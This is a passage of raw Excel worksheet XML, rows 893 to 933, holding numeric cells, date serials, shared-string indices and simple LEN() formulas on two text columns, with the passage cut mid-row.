        <v>5966</v>
      </c>
      <c r="D893" t="s">
        <v>10849</v>
      </c>
      <c r="E893">
        <v>19</v>
      </c>
      <c r="F893" t="s">
        <v>10851</v>
      </c>
      <c r="G893" s="1">
        <v>43970</v>
      </c>
      <c r="H893">
        <v>141200</v>
      </c>
      <c r="I893" t="s">
        <v>9536</v>
      </c>
      <c r="J893" t="s">
        <v>10469</v>
      </c>
      <c r="K893">
        <f>LEN(I893)</f>
        <v>13</v>
      </c>
      <c r="L893">
        <f>LEN(J893)</f>
        <v>11</v>
      </c>
    </row>
    <row r="894" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A894">
        <v>20100</v>
      </c>
      <c r="B894">
        <v>2310</v>
      </c>
      <c r="C894" t="s">
        <v>16339</v>
      </c>
      <c r="D894" t="s">
        <v>16340</v>
      </c>
      <c r="E894">
        <v>19</v>
      </c>
      <c r="F894" t="s">
        <v>1746</v>
      </c>
      <c r="G894" s="1">
        <v>43959</v>
      </c>
      <c r="H894" s="4">
        <v>15000</v>
      </c>
      <c r="J894" t="s">
        <v>10469</v>
      </c>
      <c r="K894">
        <f>LEN(I894)</f>
        <v>0</v>
      </c>
      <c r="L894">
        <f>LEN(J894)</f>
        <v>11</v>
      </c>
    </row>
    <row r="895" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A895">
        <v>20436</v>
      </c>
      <c r="B895">
        <v>2600</v>
      </c>
      <c r="C895" t="s">
        <v>4419</v>
      </c>
      <c r="D895" t="s">
        <v>10707</v>
      </c>
      <c r="E895">
        <v>14</v>
      </c>
      <c r="F895" t="s">
        <v>10713</v>
      </c>
      <c r="G895" s="1">
        <v>44299</v>
      </c>
      <c r="H895">
        <v>234750</v>
      </c>
      <c r="J895" t="s">
        <v>9752</v>
      </c>
      <c r="K895">
        <f>LEN(I895)</f>
        <v>0</v>
      </c>
      <c r="L895">
        <f>LEN(J895)</f>
        <v>11</v>
      </c>
    </row>
    <row r="896" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A896">
        <v>20621</v>
      </c>
      <c r="B896">
        <v>2102</v>
      </c>
      <c r="C896" t="s">
        <v>5966</v>
      </c>
      <c r="D896" t="s">
        <v>10849</v>
      </c>
      <c r="E896">
        <v>19</v>
      </c>
      <c r="F896" t="s">
        <v>1746</v>
      </c>
      <c r="G896" s="1">
        <v>43970</v>
      </c>
      <c r="H896">
        <v>2350</v>
      </c>
      <c r="J896" t="s">
        <v>10469</v>
      </c>
      <c r="K896">
        <f>LEN(I896)</f>
        <v>0</v>
      </c>
      <c r="L896">
        <f>LEN(J896)</f>
        <v>11</v>
      </c>
    </row>
    <row r="897" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A897">
        <v>20622</v>
      </c>
      <c r="B897">
        <v>2102</v>
      </c>
      <c r="C897" t="s">
        <v>5966</v>
      </c>
      <c r="D897" t="s">
        <v>10849</v>
      </c>
      <c r="E897">
        <v>19</v>
      </c>
      <c r="F897" t="s">
        <v>10852</v>
      </c>
      <c r="G897" s="1">
        <v>43970</v>
      </c>
      <c r="H897">
        <v>4000</v>
      </c>
      <c r="J897" t="s">
        <v>10469</v>
      </c>
      <c r="K897">
        <f>LEN(I897)</f>
        <v>0</v>
      </c>
      <c r="L897">
        <f>LEN(J897)</f>
        <v>11</v>
      </c>
    </row>
    <row r="898" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A898">
        <v>21166</v>
      </c>
      <c r="B898">
        <v>541</v>
      </c>
      <c r="C898" t="s">
        <v>1159</v>
      </c>
      <c r="D898" t="s">
        <v>11179</v>
      </c>
      <c r="E898">
        <v>16</v>
      </c>
      <c r="F898" t="s">
        <v>10392</v>
      </c>
      <c r="G898" s="1">
        <v>44034</v>
      </c>
      <c r="H898">
        <v>5000</v>
      </c>
      <c r="J898" t="s">
        <v>11181</v>
      </c>
      <c r="K898">
        <f>LEN(I898)</f>
        <v>0</v>
      </c>
      <c r="L898">
        <f>LEN(J898)</f>
        <v>11</v>
      </c>
    </row>
    <row r="899" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A899">
        <v>21326</v>
      </c>
      <c r="B899">
        <v>4759</v>
      </c>
      <c r="C899" t="s">
        <v>7012</v>
      </c>
      <c r="D899" t="s">
        <v>11305</v>
      </c>
      <c r="E899">
        <v>16</v>
      </c>
      <c r="F899" t="s">
        <v>11172</v>
      </c>
      <c r="G899" s="1">
        <v>44048</v>
      </c>
      <c r="H899">
        <v>16300</v>
      </c>
      <c r="J899" t="s">
        <v>9752</v>
      </c>
      <c r="K899">
        <f>LEN(I899)</f>
        <v>0</v>
      </c>
      <c r="L899">
        <f>LEN(J899)</f>
        <v>11</v>
      </c>
    </row>
    <row r="900" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A900">
        <v>19356</v>
      </c>
      <c r="B900">
        <v>2259</v>
      </c>
      <c r="C900" t="s">
        <v>4841</v>
      </c>
      <c r="D900" t="s">
        <v>9946</v>
      </c>
      <c r="E900">
        <v>16</v>
      </c>
      <c r="F900" t="s">
        <v>9947</v>
      </c>
      <c r="G900" s="1">
        <v>44116</v>
      </c>
      <c r="H900">
        <v>1500000</v>
      </c>
      <c r="I900" t="s">
        <v>9948</v>
      </c>
      <c r="J900" t="s">
        <v>9949</v>
      </c>
      <c r="K900">
        <f>LEN(I900)</f>
        <v>585</v>
      </c>
      <c r="L900">
        <f>LEN(J900)</f>
        <v>9</v>
      </c>
    </row>
    <row r="901" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A901">
        <v>19749</v>
      </c>
      <c r="B901">
        <v>2323</v>
      </c>
      <c r="C901" t="s">
        <v>5315</v>
      </c>
      <c r="D901" t="s">
        <v>10220</v>
      </c>
      <c r="E901">
        <v>5</v>
      </c>
      <c r="F901" t="s">
        <v>10221</v>
      </c>
      <c r="G901" s="1">
        <v>43879</v>
      </c>
      <c r="H901">
        <v>10000</v>
      </c>
      <c r="I901" t="s">
        <v>10222</v>
      </c>
      <c r="J901" t="s">
        <v>9624</v>
      </c>
      <c r="K901">
        <f>LEN(I901)</f>
        <v>49</v>
      </c>
      <c r="L901">
        <f>LEN(J901)</f>
        <v>9</v>
      </c>
    </row>
    <row r="902" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A902">
        <v>19750</v>
      </c>
      <c r="B902">
        <v>2323</v>
      </c>
      <c r="C902" t="s">
        <v>5315</v>
      </c>
      <c r="D902" t="s">
        <v>10220</v>
      </c>
      <c r="E902">
        <v>5</v>
      </c>
      <c r="F902" t="s">
        <v>10223</v>
      </c>
      <c r="G902" s="1">
        <v>43879</v>
      </c>
      <c r="H902">
        <v>300000</v>
      </c>
      <c r="I902" t="s">
        <v>10222</v>
      </c>
      <c r="J902" t="s">
        <v>9624</v>
      </c>
      <c r="K902">
        <f>LEN(I902)</f>
        <v>49</v>
      </c>
      <c r="L902">
        <f>LEN(J902)</f>
        <v>9</v>
      </c>
    </row>
    <row r="903" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A903">
        <v>19751</v>
      </c>
      <c r="B903">
        <v>2323</v>
      </c>
      <c r="C903" t="s">
        <v>5315</v>
      </c>
      <c r="D903" t="s">
        <v>10220</v>
      </c>
      <c r="E903">
        <v>5</v>
      </c>
      <c r="F903" t="s">
        <v>10224</v>
      </c>
      <c r="G903" s="1">
        <v>43879</v>
      </c>
      <c r="H903">
        <v>10000</v>
      </c>
      <c r="I903" t="s">
        <v>10222</v>
      </c>
      <c r="J903" t="s">
        <v>9624</v>
      </c>
      <c r="K903">
        <f>LEN(I903)</f>
        <v>49</v>
      </c>
      <c r="L903">
        <f>LEN(J903)</f>
        <v>9</v>
      </c>
    </row>
    <row r="904" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A904">
        <v>19752</v>
      </c>
      <c r="B904">
        <v>2323</v>
      </c>
      <c r="C904" t="s">
        <v>5315</v>
      </c>
      <c r="D904" t="s">
        <v>10220</v>
      </c>
      <c r="E904">
        <v>5</v>
      </c>
      <c r="F904" t="s">
        <v>10225</v>
      </c>
      <c r="G904" s="1">
        <v>43879</v>
      </c>
      <c r="H904">
        <v>150000</v>
      </c>
      <c r="I904" t="s">
        <v>10222</v>
      </c>
      <c r="J904" t="s">
        <v>9624</v>
      </c>
      <c r="K904">
        <f>LEN(I904)</f>
        <v>49</v>
      </c>
      <c r="L904">
        <f>LEN(J904)</f>
        <v>9</v>
      </c>
    </row>
    <row r="905" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A905">
        <v>19753</v>
      </c>
      <c r="B905">
        <v>2323</v>
      </c>
      <c r="C905" t="s">
        <v>5315</v>
      </c>
      <c r="D905" t="s">
        <v>10220</v>
      </c>
      <c r="E905">
        <v>5</v>
      </c>
      <c r="F905" t="s">
        <v>9676</v>
      </c>
      <c r="G905" s="1">
        <v>43879</v>
      </c>
      <c r="H905">
        <v>12000</v>
      </c>
      <c r="I905" t="s">
        <v>10222</v>
      </c>
      <c r="J905" t="s">
        <v>9624</v>
      </c>
      <c r="K905">
        <f>LEN(I905)</f>
        <v>49</v>
      </c>
      <c r="L905">
        <f>LEN(J905)</f>
        <v>9</v>
      </c>
    </row>
    <row r="906" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A906">
        <v>20140</v>
      </c>
      <c r="B906">
        <v>782</v>
      </c>
      <c r="C906" t="s">
        <v>725</v>
      </c>
      <c r="D906" t="s">
        <v>10500</v>
      </c>
      <c r="E906">
        <v>32</v>
      </c>
      <c r="F906" t="s">
        <v>10101</v>
      </c>
      <c r="G906" s="1">
        <v>43910</v>
      </c>
      <c r="H906">
        <v>5000</v>
      </c>
      <c r="I906" t="s">
        <v>10501</v>
      </c>
      <c r="J906" t="s">
        <v>9624</v>
      </c>
      <c r="K906">
        <f>LEN(I906)</f>
        <v>48</v>
      </c>
      <c r="L906">
        <f>LEN(J906)</f>
        <v>9</v>
      </c>
    </row>
    <row r="907" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A907">
        <v>19943</v>
      </c>
      <c r="B907">
        <v>2331</v>
      </c>
      <c r="C907" t="s">
        <v>16321</v>
      </c>
      <c r="D907" t="s">
        <v>16322</v>
      </c>
      <c r="E907">
        <v>26</v>
      </c>
      <c r="F907" t="s">
        <v>10347</v>
      </c>
      <c r="G907" s="1">
        <v>43909</v>
      </c>
      <c r="H907" s="4">
        <v>2500</v>
      </c>
      <c r="I907" t="s">
        <v>10010</v>
      </c>
      <c r="J907" t="s">
        <v>9624</v>
      </c>
      <c r="K907">
        <f>LEN(I907)</f>
        <v>33</v>
      </c>
      <c r="L907">
        <f>LEN(J907)</f>
        <v>9</v>
      </c>
    </row>
    <row r="908" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A908">
        <v>20159</v>
      </c>
      <c r="B908">
        <v>2110</v>
      </c>
      <c r="C908" t="s">
        <v>5697</v>
      </c>
      <c r="D908" t="s">
        <v>10516</v>
      </c>
      <c r="E908">
        <v>5</v>
      </c>
      <c r="F908" t="s">
        <v>9928</v>
      </c>
      <c r="G908" s="1">
        <v>43930</v>
      </c>
      <c r="H908">
        <v>7000</v>
      </c>
      <c r="I908" t="s">
        <v>10518</v>
      </c>
      <c r="J908" t="s">
        <v>9624</v>
      </c>
      <c r="K908">
        <f>LEN(I908)</f>
        <v>31</v>
      </c>
      <c r="L908">
        <f>LEN(J908)</f>
        <v>9</v>
      </c>
    </row>
    <row r="909" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A909">
        <v>20161</v>
      </c>
      <c r="B909">
        <v>2110</v>
      </c>
      <c r="C909" t="s">
        <v>5697</v>
      </c>
      <c r="D909" t="s">
        <v>10516</v>
      </c>
      <c r="E909">
        <v>5</v>
      </c>
      <c r="F909" t="s">
        <v>10519</v>
      </c>
      <c r="G909" s="1">
        <v>43930</v>
      </c>
      <c r="H909">
        <v>7000</v>
      </c>
      <c r="I909" t="s">
        <v>10518</v>
      </c>
      <c r="J909" t="s">
        <v>9624</v>
      </c>
      <c r="K909">
        <f>LEN(I909)</f>
        <v>31</v>
      </c>
      <c r="L909">
        <f>LEN(J909)</f>
        <v>9</v>
      </c>
    </row>
    <row r="910" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A910">
        <v>20407</v>
      </c>
      <c r="B910">
        <v>2205</v>
      </c>
      <c r="C910" t="s">
        <v>5834</v>
      </c>
      <c r="D910" t="s">
        <v>10691</v>
      </c>
      <c r="E910">
        <v>14</v>
      </c>
      <c r="F910" t="s">
        <v>8141</v>
      </c>
      <c r="G910" s="1">
        <v>44070</v>
      </c>
      <c r="H910">
        <v>308</v>
      </c>
      <c r="I910" t="s">
        <v>10692</v>
      </c>
      <c r="J910" t="s">
        <v>9949</v>
      </c>
      <c r="K910">
        <f>LEN(I910)</f>
        <v>28</v>
      </c>
      <c r="L910">
        <f>LEN(J910)</f>
        <v>9</v>
      </c>
    </row>
    <row r="911" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A911">
        <v>21349</v>
      </c>
      <c r="B911">
        <v>2715</v>
      </c>
      <c r="C911" t="s">
        <v>6944</v>
      </c>
      <c r="D911" t="s">
        <v>11323</v>
      </c>
      <c r="E911">
        <v>18</v>
      </c>
      <c r="F911" t="s">
        <v>9925</v>
      </c>
      <c r="G911" s="1">
        <v>44116</v>
      </c>
      <c r="H911">
        <v>100</v>
      </c>
      <c r="I911" t="s">
        <v>11324</v>
      </c>
      <c r="J911" t="s">
        <v>9949</v>
      </c>
      <c r="K911">
        <f>LEN(I911)</f>
        <v>23</v>
      </c>
      <c r="L911">
        <f>LEN(J911)</f>
        <v>9</v>
      </c>
    </row>
    <row r="912" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A912">
        <v>20322</v>
      </c>
      <c r="B912">
        <v>689</v>
      </c>
      <c r="C912" t="s">
        <v>881</v>
      </c>
      <c r="D912" t="s">
        <v>10623</v>
      </c>
      <c r="E912">
        <v>16</v>
      </c>
      <c r="F912" t="s">
        <v>10392</v>
      </c>
      <c r="G912" s="1">
        <v>43980</v>
      </c>
      <c r="H912">
        <v>200</v>
      </c>
      <c r="I912" t="s">
        <v>10624</v>
      </c>
      <c r="J912" t="s">
        <v>10625</v>
      </c>
      <c r="K912">
        <f>LEN(I912)</f>
        <v>20</v>
      </c>
      <c r="L912">
        <f>LEN(J912)</f>
        <v>9</v>
      </c>
    </row>
    <row r="913" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A913">
        <v>18853</v>
      </c>
      <c r="B913">
        <v>175</v>
      </c>
      <c r="C913" t="s">
        <v>335</v>
      </c>
      <c r="D913" t="s">
        <v>9850</v>
      </c>
      <c r="E913">
        <v>6</v>
      </c>
      <c r="F913" t="s">
        <v>9851</v>
      </c>
      <c r="G913" s="1">
        <v>43845</v>
      </c>
      <c r="H913">
        <v>0</v>
      </c>
      <c r="I913" t="s">
        <v>9852</v>
      </c>
      <c r="J913" t="s">
        <v>9501</v>
      </c>
      <c r="K913">
        <f>LEN(I913)</f>
        <v>19</v>
      </c>
      <c r="L913">
        <f>LEN(J913)</f>
        <v>9</v>
      </c>
    </row>
    <row r="914" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A914">
        <v>21301</v>
      </c>
      <c r="B914">
        <v>2532</v>
      </c>
      <c r="C914" t="s">
        <v>6139</v>
      </c>
      <c r="D914" t="s">
        <v>11281</v>
      </c>
      <c r="E914">
        <v>6</v>
      </c>
      <c r="F914" t="s">
        <v>6141</v>
      </c>
      <c r="G914" s="1">
        <v>44040</v>
      </c>
      <c r="H914">
        <v>16800</v>
      </c>
      <c r="I914" t="s">
        <v>9852</v>
      </c>
      <c r="J914" t="s">
        <v>9624</v>
      </c>
      <c r="K914">
        <f>LEN(I914)</f>
        <v>19</v>
      </c>
      <c r="L914">
        <f>LEN(J914)</f>
        <v>9</v>
      </c>
    </row>
    <row r="915" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A915">
        <v>19357</v>
      </c>
      <c r="B915">
        <v>2526</v>
      </c>
      <c r="C915" t="s">
        <v>4891</v>
      </c>
      <c r="D915" t="s">
        <v>9950</v>
      </c>
      <c r="E915">
        <v>2</v>
      </c>
      <c r="F915" t="s">
        <v>9951</v>
      </c>
      <c r="G915" s="1">
        <v>43853</v>
      </c>
      <c r="H915">
        <v>3000000</v>
      </c>
      <c r="I915" t="s">
        <v>9952</v>
      </c>
      <c r="J915" t="s">
        <v>9949</v>
      </c>
      <c r="K915">
        <f>LEN(I915)</f>
        <v>18</v>
      </c>
      <c r="L915">
        <f>LEN(J915)</f>
        <v>9</v>
      </c>
    </row>
    <row r="916" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A916">
        <v>19368</v>
      </c>
      <c r="B916">
        <v>2526</v>
      </c>
      <c r="C916" t="s">
        <v>4891</v>
      </c>
      <c r="D916" t="s">
        <v>9950</v>
      </c>
      <c r="E916">
        <v>2</v>
      </c>
      <c r="F916" t="s">
        <v>3076</v>
      </c>
      <c r="G916" s="1">
        <v>43853</v>
      </c>
      <c r="H916">
        <v>600000</v>
      </c>
      <c r="I916" t="s">
        <v>9550</v>
      </c>
      <c r="J916" t="s">
        <v>9949</v>
      </c>
      <c r="K916">
        <f>LEN(I916)</f>
        <v>18</v>
      </c>
      <c r="L916">
        <f>LEN(J916)</f>
        <v>9</v>
      </c>
    </row>
    <row r="917" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A917">
        <v>19556</v>
      </c>
      <c r="B917">
        <v>2331</v>
      </c>
      <c r="C917" t="s">
        <v>5205</v>
      </c>
      <c r="D917" t="s">
        <v>10099</v>
      </c>
      <c r="E917">
        <v>26</v>
      </c>
      <c r="F917" t="s">
        <v>10100</v>
      </c>
      <c r="G917" s="1">
        <v>43909</v>
      </c>
      <c r="H917">
        <v>30000</v>
      </c>
      <c r="I917" t="s">
        <v>9550</v>
      </c>
      <c r="J917" t="s">
        <v>9949</v>
      </c>
      <c r="K917">
        <f>LEN(I917)</f>
        <v>18</v>
      </c>
      <c r="L917">
        <f>LEN(J917)</f>
        <v>9</v>
      </c>
    </row>
    <row r="918" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A918">
        <v>19558</v>
      </c>
      <c r="B918">
        <v>2331</v>
      </c>
      <c r="C918" t="s">
        <v>16321</v>
      </c>
      <c r="D918" t="s">
        <v>16322</v>
      </c>
      <c r="E918">
        <v>26</v>
      </c>
      <c r="F918" t="s">
        <v>609</v>
      </c>
      <c r="G918" s="1">
        <v>43909</v>
      </c>
      <c r="H918" s="4">
        <v>100000</v>
      </c>
      <c r="I918" t="s">
        <v>9550</v>
      </c>
      <c r="J918" t="s">
        <v>10103</v>
      </c>
      <c r="K918">
        <f>LEN(I918)</f>
        <v>18</v>
      </c>
      <c r="L918">
        <f>LEN(J918)</f>
        <v>9</v>
      </c>
    </row>
    <row r="919" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A919">
        <v>19709</v>
      </c>
      <c r="B919">
        <v>1650</v>
      </c>
      <c r="C919" t="s">
        <v>2759</v>
      </c>
      <c r="D919" t="s">
        <v>10192</v>
      </c>
      <c r="E919">
        <v>18</v>
      </c>
      <c r="F919" t="s">
        <v>10193</v>
      </c>
      <c r="G919" s="1">
        <v>43944</v>
      </c>
      <c r="H919">
        <v>10000</v>
      </c>
      <c r="I919" t="s">
        <v>10194</v>
      </c>
      <c r="J919" t="s">
        <v>9624</v>
      </c>
      <c r="K919">
        <f>LEN(I919)</f>
        <v>18</v>
      </c>
      <c r="L919">
        <f>LEN(J919)</f>
        <v>9</v>
      </c>
    </row>
    <row r="920" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A920">
        <v>19791</v>
      </c>
      <c r="B920">
        <v>1650</v>
      </c>
      <c r="C920" t="s">
        <v>2759</v>
      </c>
      <c r="D920" t="s">
        <v>10192</v>
      </c>
      <c r="E920">
        <v>18</v>
      </c>
      <c r="F920" t="s">
        <v>9577</v>
      </c>
      <c r="G920" s="1">
        <v>43944</v>
      </c>
      <c r="H920">
        <v>1000</v>
      </c>
      <c r="I920" t="s">
        <v>10194</v>
      </c>
      <c r="J920" t="s">
        <v>9624</v>
      </c>
      <c r="K920">
        <f>LEN(I920)</f>
        <v>18</v>
      </c>
      <c r="L920">
        <f>LEN(J920)</f>
        <v>9</v>
      </c>
    </row>
    <row r="921" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A921">
        <v>20259</v>
      </c>
      <c r="B921">
        <v>596</v>
      </c>
      <c r="C921" t="s">
        <v>835</v>
      </c>
      <c r="D921" t="s">
        <v>10583</v>
      </c>
      <c r="E921">
        <v>12</v>
      </c>
      <c r="F921" t="s">
        <v>2236</v>
      </c>
      <c r="G921" s="1">
        <v>43959</v>
      </c>
      <c r="H921">
        <v>10000</v>
      </c>
      <c r="I921" t="s">
        <v>9550</v>
      </c>
      <c r="J921" t="s">
        <v>9501</v>
      </c>
      <c r="K921">
        <f>LEN(I921)</f>
        <v>18</v>
      </c>
      <c r="L921">
        <f>LEN(J921)</f>
        <v>9</v>
      </c>
    </row>
    <row r="922" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A922">
        <v>20630</v>
      </c>
      <c r="B922">
        <v>2608</v>
      </c>
      <c r="C922" t="s">
        <v>16341</v>
      </c>
      <c r="D922" t="s">
        <v>16342</v>
      </c>
      <c r="E922">
        <v>2</v>
      </c>
      <c r="F922" t="s">
        <v>1651</v>
      </c>
      <c r="G922" s="1">
        <v>44048</v>
      </c>
      <c r="H922" s="4">
        <v>50000</v>
      </c>
      <c r="I922" t="s">
        <v>9485</v>
      </c>
      <c r="J922" t="s">
        <v>9624</v>
      </c>
      <c r="K922">
        <f>LEN(I922)</f>
        <v>18</v>
      </c>
      <c r="L922">
        <f>LEN(J922)</f>
        <v>9</v>
      </c>
    </row>
    <row r="923" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A923">
        <v>17102</v>
      </c>
      <c r="B923">
        <v>2275</v>
      </c>
      <c r="C923" t="s">
        <v>5873</v>
      </c>
      <c r="D923" t="s">
        <v>9657</v>
      </c>
      <c r="E923">
        <v>5</v>
      </c>
      <c r="F923" t="s">
        <v>9659</v>
      </c>
      <c r="G923" s="1">
        <v>44126</v>
      </c>
      <c r="H923">
        <v>15000</v>
      </c>
      <c r="I923" t="s">
        <v>9660</v>
      </c>
      <c r="J923" t="s">
        <v>9624</v>
      </c>
      <c r="K923">
        <f>LEN(I923)</f>
        <v>16</v>
      </c>
      <c r="L923">
        <f>LEN(J923)</f>
        <v>9</v>
      </c>
    </row>
    <row r="924" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A924">
        <v>19600</v>
      </c>
      <c r="B924">
        <v>806</v>
      </c>
      <c r="C924" t="s">
        <v>449</v>
      </c>
      <c r="D924" t="s">
        <v>10123</v>
      </c>
      <c r="E924">
        <v>15</v>
      </c>
      <c r="F924" t="s">
        <v>451</v>
      </c>
      <c r="G924" s="1">
        <v>44218</v>
      </c>
      <c r="H924">
        <v>9000</v>
      </c>
      <c r="I924" t="s">
        <v>10124</v>
      </c>
      <c r="J924" t="s">
        <v>9949</v>
      </c>
      <c r="K924">
        <f>LEN(I924)</f>
        <v>15</v>
      </c>
      <c r="L924">
        <f>LEN(J924)</f>
        <v>9</v>
      </c>
    </row>
    <row r="925" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A925">
        <v>19938</v>
      </c>
      <c r="B925">
        <v>492</v>
      </c>
      <c r="C925" t="s">
        <v>578</v>
      </c>
      <c r="D925" t="s">
        <v>10344</v>
      </c>
      <c r="E925">
        <v>23</v>
      </c>
      <c r="F925" t="s">
        <v>1403</v>
      </c>
      <c r="G925" s="1">
        <v>43892</v>
      </c>
      <c r="H925">
        <v>33600</v>
      </c>
      <c r="I925" t="s">
        <v>10345</v>
      </c>
      <c r="J925" t="s">
        <v>9949</v>
      </c>
      <c r="K925">
        <f>LEN(I925)</f>
        <v>15</v>
      </c>
      <c r="L925">
        <f>LEN(J925)</f>
        <v>9</v>
      </c>
    </row>
    <row r="926" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A926">
        <v>19939</v>
      </c>
      <c r="B926">
        <v>492</v>
      </c>
      <c r="C926" t="s">
        <v>578</v>
      </c>
      <c r="D926" t="s">
        <v>10344</v>
      </c>
      <c r="E926">
        <v>23</v>
      </c>
      <c r="F926" t="s">
        <v>10346</v>
      </c>
      <c r="G926" s="1">
        <v>43892</v>
      </c>
      <c r="H926">
        <v>16800</v>
      </c>
      <c r="I926" t="s">
        <v>10345</v>
      </c>
      <c r="J926" t="s">
        <v>9949</v>
      </c>
      <c r="K926">
        <f>LEN(I926)</f>
        <v>15</v>
      </c>
      <c r="L926">
        <f>LEN(J926)</f>
        <v>9</v>
      </c>
    </row>
    <row r="927" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A927">
        <v>21096</v>
      </c>
      <c r="B927">
        <v>475</v>
      </c>
      <c r="C927" t="s">
        <v>1519</v>
      </c>
      <c r="D927" t="s">
        <v>11137</v>
      </c>
      <c r="E927">
        <v>16</v>
      </c>
      <c r="F927" t="s">
        <v>945</v>
      </c>
      <c r="G927" s="1">
        <v>44039</v>
      </c>
      <c r="H927">
        <v>482788</v>
      </c>
      <c r="I927" t="s">
        <v>10124</v>
      </c>
      <c r="J927" t="s">
        <v>10625</v>
      </c>
      <c r="K927">
        <f>LEN(I927)</f>
        <v>15</v>
      </c>
      <c r="L927">
        <f>LEN(J927)</f>
        <v>9</v>
      </c>
    </row>
    <row r="928" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A928">
        <v>21148</v>
      </c>
      <c r="B928">
        <v>990</v>
      </c>
      <c r="C928" t="s">
        <v>2847</v>
      </c>
      <c r="D928" t="s">
        <v>11173</v>
      </c>
      <c r="E928">
        <v>9</v>
      </c>
      <c r="F928" t="s">
        <v>9470</v>
      </c>
      <c r="G928" s="1">
        <v>44088</v>
      </c>
      <c r="H928">
        <v>20000</v>
      </c>
      <c r="I928" t="s">
        <v>10448</v>
      </c>
      <c r="J928" t="s">
        <v>9624</v>
      </c>
      <c r="K928">
        <f>LEN(I928)</f>
        <v>14</v>
      </c>
      <c r="L928">
        <f>LEN(J928)</f>
        <v>9</v>
      </c>
    </row>
    <row r="929" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A929">
        <v>21171</v>
      </c>
      <c r="B929">
        <v>2862</v>
      </c>
      <c r="C929" t="s">
        <v>7069</v>
      </c>
      <c r="D929" t="s">
        <v>11183</v>
      </c>
      <c r="E929">
        <v>4</v>
      </c>
      <c r="F929" t="s">
        <v>11184</v>
      </c>
      <c r="G929" s="1">
        <v>43999</v>
      </c>
      <c r="H929">
        <v>276</v>
      </c>
      <c r="I929" t="s">
        <v>11185</v>
      </c>
      <c r="J929" t="s">
        <v>9949</v>
      </c>
      <c r="K929">
        <f>LEN(I929)</f>
        <v>14</v>
      </c>
      <c r="L929">
        <f>LEN(J929)</f>
        <v>9</v>
      </c>
    </row>
    <row r="930" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A930">
        <v>20433</v>
      </c>
      <c r="B930">
        <v>2600</v>
      </c>
      <c r="C930" t="s">
        <v>4419</v>
      </c>
      <c r="D930" t="s">
        <v>10707</v>
      </c>
      <c r="E930">
        <v>14</v>
      </c>
      <c r="F930" t="s">
        <v>10708</v>
      </c>
      <c r="G930" s="1">
        <v>44299</v>
      </c>
      <c r="H930">
        <v>33249</v>
      </c>
      <c r="I930" t="s">
        <v>9746</v>
      </c>
      <c r="J930" t="s">
        <v>9501</v>
      </c>
      <c r="K930">
        <f>LEN(I930)</f>
        <v>13</v>
      </c>
      <c r="L930">
        <f>LEN(J930)</f>
        <v>9</v>
      </c>
    </row>
    <row r="931" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A931">
        <v>20689</v>
      </c>
      <c r="B931">
        <v>582</v>
      </c>
      <c r="C931" t="s">
        <v>476</v>
      </c>
      <c r="D931" t="s">
        <v>10890</v>
      </c>
      <c r="E931">
        <v>29</v>
      </c>
      <c r="F931" t="s">
        <v>3204</v>
      </c>
      <c r="G931" s="1">
        <v>43959</v>
      </c>
      <c r="H931">
        <v>25000</v>
      </c>
      <c r="I931" t="s">
        <v>9536</v>
      </c>
      <c r="J931" t="s">
        <v>10625</v>
      </c>
      <c r="K931">
        <f>LEN(I931)</f>
        <v>13</v>
      </c>
      <c r="L931">
        <f>LEN(J931)</f>
        <v>9</v>
      </c>
    </row>
    <row r="932" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A932">
        <v>20691</v>
      </c>
      <c r="B932">
        <v>395</v>
      </c>
      <c r="C932" t="s">
        <v>1151</v>
      </c>
      <c r="D932" t="s">
        <v>10894</v>
      </c>
      <c r="E932">
        <v>31</v>
      </c>
      <c r="F932" t="s">
        <v>9710</v>
      </c>
      <c r="G932" s="1">
        <v>43971</v>
      </c>
      <c r="H932">
        <v>60000</v>
      </c>
      <c r="I932" t="s">
        <v>9536</v>
      </c>
      <c r="J932" t="s">
        <v>10625</v>
      </c>
      <c r="K932">
        <f>LEN(I932)</f>
        <v>13</v>
      </c>
      <c r="L932">
        <f>LEN(J932)</f>
        <v>9</v>
      </c>
    </row>
    <row r="933" spans="1:12" x14ac:dyDescent="0.2">
      <c r="A933">
        <v>20692</v>
      </c>
      <c r="B933">
        <v>395</v>
      </c>
      <c r="C933" t="s">
        <v>1151</v>
      </c>
      <c r="D933" t="s">
        <v>10894</v>
      </c>
      <c r="E933">
        <v>31</v>
      </c>
      <c r="F933" t="s">
        <v>7241</v>
      </c>
      <c r="G933" s="1">
        <v>43971</v>
      </c>
      <c r="H933">
        <v>60000</v>
      </c>
      <c r="I933" t="s">
        <v>9536</v>
      </c>
      <c r="J933" t="s">
        <v>10625</v>
      </c>
      <c r="K933">
